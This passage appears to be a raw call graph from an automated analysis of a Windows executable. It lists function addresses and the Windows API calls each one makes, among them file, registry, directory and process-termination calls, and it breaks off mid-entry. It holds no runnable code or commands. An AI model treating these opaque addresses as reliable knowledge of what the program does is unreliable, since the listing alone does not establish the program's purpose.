63761->63763 63765 bb2d09 63763->63765 63764 bc016b 9 API calls 63764->63772 63768 bb30e0 9 API calls 63765->63768 63765->63770 63766 bb3032 63767 bc019b 9 API calls 63767->63772 63774 bb2d23 63768->63774 63769 bb2edd 63769->63735 63770->63766 63773 bb2e3b messages 63770->63773 63776 bb30e0 9 API calls 63770->63776 63828 ba7923 63770->63828 63833 c165b4 63770->63833 63838 c2eb63 63770->63838 63867 c2a4b4 63770->63867 63873 c195f6 63770->63873 63885 c15ed5 63770->63885 63905 c18e39 63770->63905 63921 c0e9c5 GetFileAttributesW 63770->63921 63923 c1de5d 63770->63923 63928 c16d2d 63770->63928 63937 bbf95e 63770->63937 63942 c29eea 63770->63942 63945 ba7953 63770->63945 63949 c1874a 63770->63949 63968 c2a8ae 63770->63968 63972 c2a5ac 63770->63972 63976 bbbe75 63770->63976 64022 c18d34 63770->64022 64025 c2cd16 63770->64025 64103 c14ad5 63770->64103 63771 bb02f0 143 API calls 63771->63772 63772->63755 63772->63759 63772->63764 63772->63767 63772->63770 63772->63771 63773->63769 64108 bbe29c 9 API calls messages 63773->64108 63774->63770 63777 babe6d 9 API calls 63774->63777 63776->63770 63777->63770 63798->63735 63800 ba8e85 63799->63800 63808 ba8e82 63799->63808 63801 ba8e8d 63800->63801 63803 be6a29 63800->63803 63805 be6aa2 63800->63805 63802 bc016b 9 API calls 63801->63802 63804 ba8ea7 63802->63804 63803->63805 63807 bc019b 9 API calls 63803->63807 63806 bab25f 11 API calls 63804->63806 63806->63808 63809 be6a72 63807->63809 63808->63727 63810 bc016b 9 API calls 63809->63810 63811 be6a99 63810->63811 63812 bab25f 11 API calls 63811->63812 63812->63805 63814 bab412 63813->63814 63815 bab40c 63813->63815 63814->63715 63815->63814 63816 babe6d 9 API calls 63815->63816 63816->63814 63817->63721 63819 bb3121 63818->63819 63824 bb30fd 63818->63824 64119 bc05d2 5 API calls __Init_thread_wait 63819->64119 63822 bb312b 63822->63824 64120 bc0588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 63822->64120 63823 bb9ec7 63827 bb2b60 63823->63827 64122 bc0588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 63823->64122 63824->63827 64121 bc05d2 5 API calls __Init_thread_wait 63824->64121 63827->63751 63829 ba7953 FindCloseChangeNotification 63828->63829 63830 ba792b 63829->63830 63831 ba7953 FindCloseChangeNotification 63830->63831 63832 ba793a messages 63831->63832 63832->63770 63834 ba8e70 11 API calls 63833->63834 63835 c165c7 63834->63835 64123 c0e387 lstrlenW 63835->64123 63837 c165d1 63837->63770 63839 c2eb7a 63838->63839 63840 ba8e70 11 API calls 63839->63840 63841 c2eb89 63840->63841 64128 ba7a14 63841->64128 63844 ba8e70 11 API calls 63845 c2eba9 63844->63845 63846 c2ec26 63845->63846 63850 c2ebc1 63845->63850 63847 ba8e70 11 API calls 63846->63847 63848 c2ec2b 63847->63848 63849 c2ec38 63848->63849 63854 c2ec73 63848->63854 64167 ba6ab6 63849->64167 63850->63849 63852 c2ebdf 63850->63852 64148 ba8685 63852->64148 63855 babe6d 9 API calls 63854->63855 63857 c2ecbe 63855->63857 63856 c2ebec 64158 ba7af4 63856->64158 64133 c09b57 63857->64133 63861 ba8685 11 API calls 63862 c2ec13 63861->63862 63863 ba7af4 11 API calls 63862->63863 63865 c2ec21 63863->63865 63864 c2ec45 63864->63770 64178 ba7a59 63865->64178 63868 c2a4c7 63867->63868 63869 ba8e70 11 API calls 63868->63869 63872 c2a4d6 63868->63872 63870 c2a534 63869->63870 64220 c117be 63870->64220 63872->63770 63874 c19607 63873->63874 63875 ba8e70 11 API calls 63874->63875 63876 c19616 63875->63876 63877 ba8e70 11 API calls 63876->63877 63878 c1962e 63877->63878 63879 ba8e70 11 API calls 63878->63879 63880 c19640 63879->63880 63881 ba8e70 11 API calls 63880->63881 63882 c19655 WritePrivateProfileStringW 63881->63882 63883 c1966b WritePrivateProfileStringW 63882->63883 63884 c19677 63882->63884 63883->63884 63884->63770 63892 c15ef4 63885->63892 63903 c15f89 63885->63903 63886 ba8e70 11 API calls 63887 c15fef 63886->63887 63888 ba8e70 11 API calls 63887->63888 63889 c16001 63888->63889 64249 c0d836 63889->64249 63891 c16011 63891->63770 63893 ba8e70 11 API calls 63892->63893 63892->63903 63894 c15f3c 63893->63894 64278 ba694e 63894->64278 63896 c15f4f 63897 ba7af4 11 API calls 63896->63897 63898 c15f60 63897->63898 63898->63903 64309 c0dc8e 63898->64309 63901 bab25f 11 API calls 63902 c15f80 63901->63902 64312 c0da81 63902->64312 63903->63886 63903->63891 63906 c18e4a 63905->63906 63907 bc019b 9 API calls 63906->63907 63908 c18e54 63907->63908 64362 ba41a6 63908->64362 63911 ba8e70 11 API calls 63912 c18e6d 63911->63912 63913 ba8e70 11 API calls 63912->63913 63914 c18e85 63913->63914 63915 ba8e70 11 API calls 63914->63915 63916 c18e97 63915->63916 63917 ba8e70 11 API calls 63916->63917 63918 c18eac GetPrivateProfileStringW 63917->63918 63919 ba6ab6 11 API calls 63918->63919 63920 c18ecf messages 63919->63920 63920->63770 63922 c0e9d1 63921->63922 63922->63770 63924 bab3fe 9 API calls 63923->63924 63925 c1de70 63924->63925 64365 c1183b 63925->64365 63927 c1de78 63927->63770 63929 ba8e70 11 API calls 63928->63929 63930 c16d47 63929->63930 64387 c0e783 63930->64387 63933 c16d92 63934 ba7a59 11 API calls 63933->63934 63936 c16dd7 63934->63936 63935 ba8e70 11 API calls 63935->63933 63936->63770 63938 bbf972 63937->63938 63939 bbf97a timeGetTime 63938->63939 63940 bffac0 Sleep 63938->63940 63941 bbf990 63939->63941 63941->63770 64394 c288b6 63942->64394 63944 c29efa 63944->63770 63946 ba796c 63945->63946 63947 ba795d 63945->63947 63946->63947 63948 ba7971 FindCloseChangeNotification 63946->63948 63947->63770 63948->63947 63950 c1875a 63949->63950 63951 ba8e70 11 API calls 63950->63951 63953 c1877b 63951->63953 63952 ba8e70 11 API calls 63954 c1887c 63952->63954 63953->63952 63959 c18973 63953->63959 63955 c188f7 GetCurrentDirectoryW SetCurrentDirectoryW 63954->63955 63956 c18921 63955->63956 63955->63959 63957 c0e387 4 API calls 63956->63957 63958 c1892a 63957->63958 63958->63959 63960 c0e9c5 GetFileAttributesW 63958->63960 63959->63770 63961 c18938 63960->63961 63962 c18940 GetFileAttributesW SetFileAttributesW 63961->63962 63967 c189cb 63961->63967 63963 c189b1 63962->63963 63964 c18969 SetCurrentDirectoryW 63962->63964 63965 c18a02 SetCurrentDirectoryW 63963->63965 63966 c189b5 SetCurrentDirectoryW 63963->63966 63964->63959 63965->63959 63966->63967 63967->63965 63969 c2a8ca 63968->63969 63970 c2a90a 63968->63970 63969->63770 63970->63969 64464 c10287 63970->64464 63973 c2a607 63972->63973 63975 c2a5c7 63972->63975 63974 c10287 37 API calls 63973->63974 63973->63975 63974->63975 63975->63770 63977 ba6ab6 11 API calls 63976->63977 63978 bbbe8d 63977->63978 63979 bc016b 9 API calls 63978->63979 63985 bbbf1f 63978->63985 63980 bbbea6 63979->63980 63981 bc019b 9 API calls 63980->63981 63982 bbbeb7 63981->63982 63983 ba7953 FindCloseChangeNotification 63982->63983 63984 bbbec2 63983->63984 63986 ba7953 FindCloseChangeNotification 63984->63986 63992 bbbf33 63985->63992 64528 bbfdc9 63985->64528 63988 bbbed1 63986->63988 63989 ba8e70 11 API calls 63988->63989 63990 bbbedd 63989->63990 63991 ba7953 FindCloseChangeNotification 63990->63991 63993 bbbee7 63991->63993 63994 bbbf4e 63992->63994 63995 bf8ff9 63992->63995 64506 ba6e52 63993->64506 63997 ba7a14 11 API calls 63994->63997 63998 bc019b 9 API calls 63995->63998 64001 bbbf56 63997->64001 63999 bf8ffe 63998->63999 64003 bf9012 63999->64003 64552 ba41c9 63999->64552 64533 bbbfbc 64001->64533 64008 c11759 11 API calls 64003->64008 64014 bf9016 __fread_nolock 64003->64014 64004 bbbf00 64513 ba6b12 64004->64513 64005 bf8f72 64009 ba7923 FindCloseChangeNotification 64005->64009 64006 bbbf65 64011 ba7a59 11 API calls 64006->64011 64006->64014 64008->64014 64009->63985 64015 bbbf79 64011->64015 64012 bbbf0e 64547 ba6afb SetFilePointerEx SetFilePointerEx SetFilePointerEx 64012->64547 64017 bbbfb3 64015->64017 64018 ba7953 FindCloseChangeNotification 64015->64018 64016 bbbf15 64016->63985 64548 c0d4bf 64016->64548 64017->63770 64020 bbbfa7 64018->64020 64020->64017 64021 ba7923 FindCloseChangeNotification 64020->64021 64021->64017 64607 c1a240 64022->64607 64024 c18d44 64024->63770 64026 c2cd39 64025->64026 64027 ba8e70 11 API calls 64026->64027 64035 c2cdda 64026->64035 64028 c2cd71 64027->64028 64673 c2d2f7 64028->64673 64030 c2cdd6 64031 c2ce0f RegConnectRegistryW 64030->64031 64032 c2ce76 RegCreateKeyExW 64030->64032 64030->64035 64031->64032 64031->64035 64034 c2cf0e 64032->64034 64044 c2cead 64032->64044 64036 c2d1d6 RegCloseKey 64034->64036 64037 ba8e70 11 API calls 64034->64037 64035->63770 64036->64035 64038 c2d1e9 RegCloseKey 64036->64038 64039 c2cf29 64037->64039 64038->64035 64040 bc4db8 31 API calls 64039->64040 64041 c2cf38 64040->64041 64042 c2cf96 64041->64042 64043 c2cf44 64041->64043 64047 ba8e70 11 API calls 64042->64047 64045 ba8e70 11 API calls 64043->64045 64044->64035 64046 c2ceff RegCloseKey 64044->64046 64048 c2cf4e _wcslen 64045->64048 64046->64035 64049 c2cfa0 64047->64049 64054 ba8e70 11 API calls 64048->64054 64050 bc4db8 31 API calls 64049->64050 64051 c2cfaf 64050->64051 64052 c2d047 64051->64052 64053 c2cfbf 64051->64053 64055 ba8e70 11 API calls 64052->64055 64056 ba8e70 11 API calls 64053->64056 64057 c2cf70 64054->64057 64058 c2d051 64055->64058 64059 c2cfc9 _wcslen 64056->64059 64060 ba8e70 11 API calls 64057->64060 64061 bc4db8 31 API calls 64058->64061 64066 ba8e70 11 API calls 64059->64066 64102 c2cf85 64060->64102 64062 c2d060 64061->64062 64064 c2d070 64062->64064 64065 c2d156 64062->64065 64063 c2d2bb RegSetValueExW 64063->64036 64083 c2d01f 64063->64083 64067 ba8e70 11 API calls 64064->64067 64069 ba8e70 11 API calls 64065->64069 64068 c2cfeb 64066->64068 64071 c2d07a 64067->64071 64072 ba8e70 11 API calls 64068->64072 64070 c2d160 64069->64070 64073 bc4db8 31 API calls 64070->64073 64074 bc019b 9 API calls 64071->64074 64075 c2d000 RegSetValueExW 64072->64075 64076 c2d16f 64073->64076 64077 c2d09f 64074->64077 64075->64036 64075->64083 64078 c2d215 64076->64078 64079 c2d17f 64076->64079 64080 ba8e70 11 API calls 64077->64080 64081 ba8e70 11 API calls 64078->64081 64084 ba8e70 11 API calls 64079->64084 64092 c2d0b4 64080->64092 64082 c2d21f 64081->64082 64085 bc4db8 31 API calls 64082->64085 64083->64036 64086 c2d198 RegSetValueExW 64084->64086 64087 c2d22e 64085->64087 64086->64036 64086->64083 64090 c2d265 64087->64090 64091 c2d23a 64087->64091 64088 ba8e70 11 API calls 64094 c2d106 RegSetValueExW 64088->64094 64093 ba8e70 11 API calls 64090->64093 64097 ba8e70 11 API calls 64091->64097 64092->64088 64095 c2d26f 64093->64095 64094->64083 64096 bc4db8 31 API calls 64095->64096 64098 c2d27e 64096->64098 64097->64086 64098->64083 64679 c1276a 11 API calls 64098->64679 64100 c2d296 64101 ba8e70 11 API calls 64100->64101 64101->64102 64102->64063 64104 ba8e70 11 API calls 64103->64104 64105 c14ae8 64104->64105 64106 c0da81 4 API calls 64105->64106 64107 c14af0 64106->64107 64107->63770 64108->63773 64109->63746 64111 bab26e _wcslen 64110->64111 64112 bc019b 9 API calls 64111->64112 64113 bab296 __fread_nolock 64112->64113 64114 bc016b 9 API calls 64113->64114 64115 bab2ac 64114->64115 64115->63756 64116->63748 64117->63766 64118->63774 64119->63822 64120->63824 64121->63823 64122->63827 64124 c0e3a5 GetFileAttributesW 64123->64124 64125 c0e3cf 64123->64125 64124->64125 64126 c0e3b1 FindFirstFileW 64124->64126 64125->63837 64126->64125 64127 c0e3c2 FindClose 64126->64127 64127->64125 64129 bc019b 9 API calls 64128->64129 64130 ba7a39 64129->64130 64131 bc016b 9 API calls 64130->64131 64132 ba7a47 64131->64132 64132->63844 64134 c09b6d 64133->64134 64135 ba7a14 11 API calls 64134->64135 64136 c09b81 64135->64136 64138 ba8685 11 API calls 64136->64138 64142 c09ba3 64136->64142 64137 ba8685 11 API calls 64137->64142 64138->64142 64139 ba7af4 11 API calls 64139->64142 64140 c09c42 64141 babe6d 9 API calls 64140->64141 64143 c09c51 64140->64143 64141->64143 64142->64137 64142->64139 64142->64140 64144 c09c26 64142->64144 64143->63865 64145 ba8685 11 API calls 64144->64145 64146 c09c36 64145->64146 64147 ba7af4 11 API calls 64146->64147 64147->64140 64149 ba86c2 __fread_nolock 64148->64149 64150 ba8694 64148->64150 64149->63856 64150->64149 64151 ba86ba 64150->64151 64152 be66b7 64150->64152 64184 ba8894 64151->64184 64153 bc016b 9 API calls 64152->64153 64155 be66c1 64153->64155 64156 bc019b 9 API calls 64155->64156 64157 be66f4 64156->64157 64159 ba7b06 64158->64159 64160 be63b3 64158->64160 64188 ba7b17 64159->64188 64198 ba662b 11 API calls __fread_nolock 64160->64198 64163 ba7b12 64163->63861 64164 be63bd 64165 be63c9 64164->64165 64166 babe6d 9 API calls 64164->64166 64166->64165 64168 be587b 64167->64168 64169 ba6ac6 64167->64169 64170 be588c 64168->64170 64204 ba84b7 64168->64204 64174 bc016b 9 API calls 64169->64174 64214 babceb 64170->64214 64173 be5896 64173->64173 64175 ba6ad9 64174->64175 64176 bab25f 11 API calls 64175->64176 64177 ba6aea 64175->64177 64176->64177 64177->63864 64179 ba7a9e 64178->64179 64181 ba7a65 64178->64181 64180 babe6d 9 API calls 64179->64180 64182 ba7a78 64179->64182 64180->64182 64183 bc016b 9 API calls 64181->64183 64182->63864 64183->64182 64185 ba88a6 64184->64185 64186 ba88ac 64184->64186 64185->64149 64187 bc019b 9 API calls 64186->64187 64187->64185 64189 ba7b26 64188->64189 64194 ba7b5a __fread_nolock 64188->64194 64190 be63e4 64189->64190 64191 ba7b4d 64189->64191 64189->64194 64192 bc016b 9 API calls 64190->64192 64199 ba7cb3 64191->64199 64195 be63f3 64192->64195 64194->64163 64196 bc019b 9 API calls 64195->64196 64197 be6427 __fread_nolock 64196->64197 64198->64164 64200 ba7cc4 __fread_nolock 64199->64200 64201 ba7cc9 64199->64201 64200->64194 64202 be64be 64201->64202 64203 bc019b 9 API calls 64201->64203 64203->64200 64205 be65bb 64204->64205 64206 ba84c7 _wcslen 64204->64206 64207 ba84dd 64206->64207 64208 ba8502 64206->64208 64210 ba8894 9 API calls 64207->64210 64209 bc016b 9 API calls 64208->64209 64211 ba850e 64209->64211 64212 ba84e5 __fread_nolock 64210->64212 64213 bc019b 9 API calls 64211->64213 64212->64170 64213->64212 64215 babcf8 64214->64215 64216 babd05 64214->64216 64215->64173 64217 bc016b 9 API calls 64216->64217 64218 babd0f 64217->64218 64219 bc019b 9 API calls 64218->64219 64219->64215 64221 c117cb 64220->64221 64222 bc016b 9 API calls 64221->64222 64223 c117d2 64222->64223 64226 c0fbca 64223->64226 64225 c1180c 64225->63872 64240 bac269 64226->64240 64228 c0fbdd CharLowerBuffW 64231 c0fbf0 64228->64231 64229 ba627c 11 API calls 64229->64231 64230 c0fbfa ___scrt_fastfail 64230->64225 64231->64229 64231->64230 64232 c0fc2e 64231->64232 64235 c0fc40 64232->64235 64246 ba627c 64232->64246 64234 bc019b 9 API calls 64236 c0fc6e 64234->64236 64235->64234 64236->64230 64237 bc016b 9 API calls 64236->64237 64238 c0fce7 64237->64238 64239 bc019b 9 API calls 64238->64239 64239->64230 64241 bac279 __fread_nolock 64240->64241 64242 bac27c 64240->64242 64241->64228 64243 bc016b 9 API calls 64242->64243 64244 bac287 64243->64244 64245 bc019b 9 API calls 64244->64245 64245->64241 64247 bac269 11 API calls 64246->64247 64248 ba6287 64247->64248 64248->64235 64250 c0d853 64249->64250 64320 c0e958 64250->64320 64252 c0d882 64253 c0e9c5 GetFileAttributesW 64252->64253 64254 c0d88d 64253->64254 64255 c0d89f 64254->64255 64256 ba65a4 11 API calls 64254->64256 64257 c0e9c5 GetFileAttributesW 64255->64257 64256->64255 64258 c0d8a7 64257->64258 64259 ba65a4 11 API calls 64258->64259 64260 c0d8b4 64258->64260 64259->64260 64261 ba694e 11 API calls 64260->64261 64262 c0d8d5 FindFirstFileW 64261->64262 64263 c0da23 FindClose 64262->64263 64277 c0d8f8 64262->64277 64266 c0da21 64263->64266 64264 c0d9ef FindNextFileW 64264->64277 64265 bab25f 11 API calls 64265->64277 64266->63891 64267 ba7af4 11 API calls 64267->64277 64269 c0dc8e 4 API calls 64269->64277 64270 c0da12 FindClose 64270->64266 64271 c0d984 64273 c0d9ad MoveFileW 64271->64273 64275 c0d99d DeleteFileW 64271->64275 64337 bbe2e5 64271->64337 64273->64277 64274 c0da5c CopyFileExW 64274->64277 64275->64277 64276 c0d9ca DeleteFileW 64276->64277 64277->64263 64277->64264 64277->64265 64277->64267 64277->64269 64277->64270 64277->64271 64277->64274 64277->64276 64328 ba65a4 64277->64328 64279 ba6964 64278->64279 64280 ba69b0 64279->64280 64281 be5725 64279->64281 64283 ba8685 11 API calls 64280->64283 64282 babe6d 9 API calls 64281->64282 64284 be572e 64282->64284 64286 ba69be 64283->64286 64285 babceb 11 API calls 64284->64285 64287 ba69e9 64285->64287 64286->64287 64288 ba8685 11 API calls 64286->64288 64289 ba6a38 64287->64289 64290 ba6a14 64287->64290 64304 be5750 64287->64304 64288->64287 64291 ba8685 11 API calls 64289->64291 64290->64289 64294 ba627c 11 API calls 64290->64294 64292 ba6a49 64291->64292 64293 ba6a5f 64292->64293 64298 babe6d 9 API calls 64292->64298 64295 ba6a73 64293->64295 64301 babe6d 9 API calls 64293->64301 64296 ba6a21 64294->64296 64299 ba6a7e 64295->64299 64302 babe6d 9 API calls 64295->64302 64296->64289 64300 ba8685 11 API calls 64296->64300 64297 ba84b7 11 API calls 64306 be5810 64297->64306 64298->64293 64303 babe6d 9 API calls 64299->64303 64307 ba6a89 64299->64307 64300->64289 64301->64295 64302->64299 64303->64307 64304->64297 64305 ba627c 11 API calls 64305->64306 64306->64289 64306->64305 64353 baacc0 64306->64353 64307->63896 64310 c0e387 4 API calls 64309->64310 64311 c0dc95 64310->64311 64311->63901 64311->63903 64313 ba79ed 64312->64313 64314 c0dab6 GetFileAttributesW 64313->64314 64315 c0daca GetLastError 64314->64315 64316 c0dae3 64314->64316 64317 c0dad7 CreateDirectoryW 64315->64317 64318 c0dae5 64315->64318 64316->63903 64317->64316 64317->64318 64318->64316 64319 c0db34 CreateDirectoryW 64318->64319 64319->64316 64321 c0e96d 64320->64321 64322 ba694e 11 API calls 64321->64322 64323 c0e984 64322->64323 64324 ba694e 11 API calls 64323->64324 64325 c0e994 64324->64325 64326 bbe2e5 26 API calls 64325->64326 64327 c0e9a9 64326->64327 64327->64252 64329 ba65bb 64328->64329 64330 be5629 64328->64330 64343 ba65cc 64329->64343 64331 bc016b 9 API calls 64330->64331 64333 be5633 _wcslen 64331->64333 64335 bc019b 9 API calls 64333->64335 64334 ba65c6 64334->64277 64336 be566c __fread_nolock 64335->64336 64338 bfe463 64337->64338 64339 bbe2f4 CompareStringW 64337->64339 64341 bbe319 64338->64341 64342 bce24b 25 API calls 64338->64342 64339->64341 64341->64271 64342->64338 64344 ba65dc _wcslen 64343->64344 64345 be568b 64344->64345 64346 ba65ef 64344->64346 64347 bc016b 9 API calls 64345->64347 64348 ba7cb3 9 API calls 64346->64348 64349 be5695 64347->64349 64350 ba65fc __fread_nolock 64348->64350 64351 bc019b 9 API calls 64349->64351 64350->64334 64352 be56c5 __fread_nolock 64351->64352 64354 baacd8 64353->64354 64355 bf0566 64353->64355 64354->64355 64358 baace2 64354->64358 64356 bc016b 9 API calls 64355->64356 64357 bf0577 64356->64357 64360 bc019b 9 API calls 64357->64360 64359 bc019b 9 API calls 64358->64359 64361 baaced __fread_nolock 64358->64361 64359->64361 64360->64361 64361->64306 64363 bc016b 9 API calls 64362->64363 64364 ba41b8 64363->64364 64364->63911 64366 c11852 64365->64366 64381 c1196b 64365->64381 64367 c1189f 64366->64367 64368 c11872 64366->64368 64372 c118b6 64366->64372 64369 bc019b 9 API calls 64367->64369 64368->64367 64374 c11886 64368->64374 64370 c11894 __fread_nolock 64369->64370 64379 bc016b 9 API calls 64370->64379 64371 c118d3 64371->64370 64373 c118fa 64371->64373 64371->64374 64372->64371 64375 bc019b 9 API calls 64372->64375 64377 bc019b 9 API calls 64373->64377 64376 bc019b 9 API calls 64374->64376 64375->64371 64376->64370 64378 c11900 64377->64378 64382 bbc1f1 64378->64382 64379->64381 64381->63927 64383 bc019b 9 API calls 64382->64383 64384 bbc208 64383->64384 64385 bc016b 9 API calls 64384->64385 64386 bbc214 64385->64386 64386->64370 64392 be22f0 64387->64392 64390 ba84b7 11 API calls 64391 c0e7b8 64390->64391 64391->63933 64391->63935 64393 be2304 GetShortPathNameW 64392->64393 64393->64390 64395 ba8e70 11 API calls 64394->64395 64411 c288ed 64395->64411 64397 c28bde 64409 c28932 messages 64397->64409 64419 c287e3 64397->64419 64398 ba8e70 11 API calls 64398->64411 64403 c28c25 64430 bc0000 64403->64430 64406 c28c45 64408 c28c50 GetCurrentProcess TerminateProcess 64406->64408 64407 c28c5f 64434 ba83b0 64407->64434 64408->64407 64409->63944 64411->64397 64411->64398 64411->64409 64448 c04a0c 11 API calls __fread_nolock 64411->64448 64449 c28e7c 35 API calls 64411->64449 64412 c28e22 64412->64409 64414 c28e36 FreeLibrary 64412->64414 64413 c28c87 64415 c294da 13 API calls 64413->64415 64418 c28caf 64413->64418 64414->64409 64415->64418 64417 bab3fe 9 API calls 64417->64418 64418->64412 64418->64417 64439 c294da 64418->64439 64420 c287fe 64419->64420 64424 c28849 64419->64424 64421 bc019b 9 API calls 64420->64421 64422 c28820 64421->64422 64423 bc016b 9 API calls 64422->64423 64422->64424 64423->64422 64425 c299f5 64424->64425 64426 c29c0a messages 64425->64426 64428 c29a19 _wcslen 64425->64428 64426->64403 64427 ba8e70 11 API calls 64427->64428 64428->64426 64428->64427 64429 c29ac2 _strcat 64428->64429 64429->64428 64432 bc0015 64430->64432 64431 bc00ad ResumeThread 64433 bc007b 64431->64433 64432->64431 64432->64433 64433->64406 64433->64407 64450 bac700 64434->64450 64436 ba83c0 64437 bc019b 9 API calls 64436->64437 64438 ba845c 64436->64438 64437->64438 64438->64413 64440 c294f2 64439->64440 64443 c2950e 64439->64443 64441 c2951a 64440->64441 64442 c294f9 64440->64442 64440->64443 64445 ba6ab6 11 API calls 64441->64445 64463 c0f3fd 11 API calls _strlen 64442->64463 64443->64418 64445->64443 64446 c29503 64447 ba6ab6 11 API calls 64446->64447 64447->64443 64448->64411 64449->64411 64451 bac70b 64450->64451 64452 bf1228 64451->64452 64457 bac713 messages 64451->64457 64453 bc016b 9 API calls 64452->64453 64455 bf1234 64453->64455 64454 bac71a 64454->64436 64457->64454 64458 bac780 64457->64458 64459 bac78b messages 64458->64459 64461 bac7c6 messages 64459->64461 64462 bbe29c 9 API calls messages 64459->64462 64461->64457 64462->64461 64463->64446 64478 c101bf 64464->64478 64466 c102a8 64467 c10308 64466->64467 64470 c10320 64466->64470 64473 c102ae __fread_nolock 64466->64473 64492 c104fe 13 API calls __fread_nolock 64467->64492 64469 c10368 64483 c11759 64469->64483 64470->64469 64470->64473 64493 c1276a 11 API calls 64470->64493 64473->63969 64474 c1033c 64494 c1276a 11 API calls 64474->64494 64476 c10353 __fread_nolock 64495 c1276a 11 API calls 64476->64495 64480 c1020a 64478->64480 64482 c101d0 64478->64482 64479 ba8e70 11 API calls 64479->64482 64480->64466 64482->64479 64482->64480 64496 bc4db8 64482->64496 64484 c11764 64483->64484 64485 bc016b 9 API calls 64484->64485 64486 c1176b 64485->64486 64487 c11777 64486->64487 64488 c11798 64486->64488 64489 bc019b 9 API calls 64487->64489 64490 bc019b 9 API calls 64488->64490 64491 c11780 ___scrt_fastfail 64489->64491 64490->64491 64491->64473 64492->64473 64493->64474 64494->64476 64495->64469 64497 bc4e3b 64496->64497 64500 bc4dc6 64496->64500 64505 bc4e4d 31 API calls __wsopen_s 64497->64505 64499 bc4e48 64499->64482 64503 bc4deb 64500->64503 64504 bd2b7c 19 API calls __wsopen_s 64500->64504 64502 bc4ddd 64502->64482 64503->64482 64504->64502 64505->64499 64507 ba6e69 CreateFileW 64506->64507 64508 be5985 64506->64508 64509 ba6e88 64507->64509 64508->64509 64510 be598b CreateFileW 64508->64510 64509->64004 64509->64005 64510->64509 64511 be59b3 64510->64511 64555 ba6bfa 64511->64555 64514 ba6b27 64513->64514 64527 ba6b24 messages 64513->64527 64515 ba6bfa 3 API calls 64514->64515 64514->64527 64516 ba6b44 64515->64516 64517 be589b 64516->64517 64518 ba6b51 64516->64518 64519 bbfdc9 3 API calls 64517->64519 64520 bc019b 9 API calls 64518->64520 64519->64527 64521 ba6b5d 64520->64521 64522 ba41a6 9 API calls 64521->64522 64523 ba6b67 64522->64523 64561 bab050 64523->64561 64526 ba6bfa 3 API calls 64526->64527 64527->64012 64529 ba6bfa 3 API calls 64528->64529 64530 bbfde7 64529->64530 64531 ba6bfa 3 API calls 64530->64531 64532 bbfe08 64531->64532 64532->63992 64534 bbc003 64533->64534 64535 bbbfc7 64533->64535 64536 babceb 11 API calls 64534->64536 64535->64534 64537 bbbfd6 64535->64537 64543 c0d2ab 64536->64543 64539 bbbfeb 64537->64539 64541 bbbff8 64537->64541 64538 c0d2da 64538->64006 64568 bbc009 64539->64568 64575 c0d3b2 15 API calls 64541->64575 64543->64538 64546 baacc0 11 API calls 64543->64546 64576 c0d249 64543->64576 64544 bbbff4 64544->64006 64546->64543 64547->64016 64549 c0d4d9 WriteFile 64548->64549 64550 c0d4ce 64548->64550 64549->63985 64606 c0d3f7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 64550->64606 64553 bab050 2 API calls 64552->64553 64554 ba41da 64553->64554 64554->64003 64559 ba6c11 64555->64559 64556 be58ec SetFilePointerEx 64557 ba6c98 SetFilePointerEx SetFilePointerEx 64558 ba6c64 64557->64558 64558->64509 64559->64556 64559->64557 64559->64558 64560 be58db 64559->64560 64560->64556 64562 bab0cb 64561->64562 64564 bab05e 64561->64564 64567 bbf13c SetFilePointerEx 64562->64567 64563 ba6b73 64563->64526 64564->64563 64566 bab09c ReadFile 64564->64566 64566->64563 64566->64564 64567->64564 64569 bbc1f1 11 API calls 64568->64569 64570 bbc021 64569->64570 64583 baadc1 64570->64583 64574 bbc03c 64574->64544 64575->64544 64577 c0d253 64576->64577 64578 c0d26a 64576->64578 64577->64578 64579 c0d259 64577->64579 64580 bab050 2 API calls 64578->64580 64581 bab050 2 API calls 64579->64581 64582 c0d263 64580->64582 64581->64582 64582->64543 64586 baadd2 64583->64586 64584 baae07 64584->64574 64588 ba8774 MultiByteToWideChar 64584->64588 64585 bab050 2 API calls 64585->64586 64586->64584 64586->64585 64596 bab0e3 11 API calls __fread_nolock 64586->64596 64589 ba87a0 64588->64589 64590 ba87e7 64588->64590 64592 bc019b 9 API calls 64589->64592 64591 babceb 11 API calls 64590->64591 64595 ba87db 64591->64595 64593 ba87b5 MultiByteToWideChar 64592->64593 64597 ba87f0 64593->64597 64595->64574 64596->64586 64598 ba8803 64597->64598 64603 ba8821 __fread_nolock 64597->64603 64599 ba8819 64598->64599 64600 ba8847 64598->64600 64598->64603 64602 ba8894 9 API calls 64599->64602 64601 bc016b 9 API calls 64600->64601 64604 ba8851 64601->64604 64602->64603 64603->64595 64605 bc019b 9 API calls 64604->64605 64605->64603 64606->64549 64608 c1a25f 64607->64608 64613 c1a2ff 64607->64613 64609 bc016b 9 API calls 64608->64609 64610 c1a266 64609->64610 64611 bc019b 9 API calls 64610->64611 64612 c1a277 64611->64612 64615 ba7953 FindCloseChangeNotification 64612->64615 64614 c1a422 64613->64614 64616 c1a327 64613->64616 64620 c1a390 64613->64620 64667 c1276a 11 API calls 64614->64667 64618 c1a282 64615->64618 64616->64024 64621 ba7953 FindCloseChangeNotification 64618->64621 64619 c1a429 64624 c0d4bf 4 API calls 64619->64624 64622 ba8e70 11 API calls 64620->64622 64623 c1a291 64621->64623 64632 c1a397 64622->64632 64625 ba8e70 11 API calls 64623->64625 64648 c1a405 64624->64648 64628 c1a29d 64625->64628 64626 c1a418 64654 c0d517 64626->64654 64630 ba7953 FindCloseChangeNotification 64628->64630 64629 c1a3cb 64631 ba7a14 11 API calls 64629->64631 64634 c1a2a7 64630->64634 64635 c1a3db 64631->64635 64632->64626 64632->64629 64633 ba7953 FindCloseChangeNotification 64636 c1a47b 64633->64636 64637 ba6e52 5 API calls 64634->64637 64638 c1a3eb 64635->64638 64641 babe6d 9 API calls 64635->64641 64639 ba7923 FindCloseChangeNotification 64636->64639 64640 c1a2b6 64637->64640 64642 ba65a4 11 API calls 64638->64642 64639->64616 64643 c1a2ba 64640->64643 64644 c1a31f 64640->64644 64641->64638 64645 c1a3f9 64642->64645 64649 ba6b12 16 API calls 64643->64649 64646 ba7923 FindCloseChangeNotification 64644->64646 64647 c0d517 15 API calls 64645->64647 64646->64616 64647->64648 64648->64616 64648->64633 64650 c1a2c8 64649->64650 64666 ba6afb SetFilePointerEx SetFilePointerEx SetFilePointerEx 64650->64666 64652 c1a2cf 64652->64613 64653 c0d4bf 4 API calls 64652->64653 64653->64613 64655 c0d52a 64654->64655 64656 c0d58e 64654->64656 64655->64656 64659 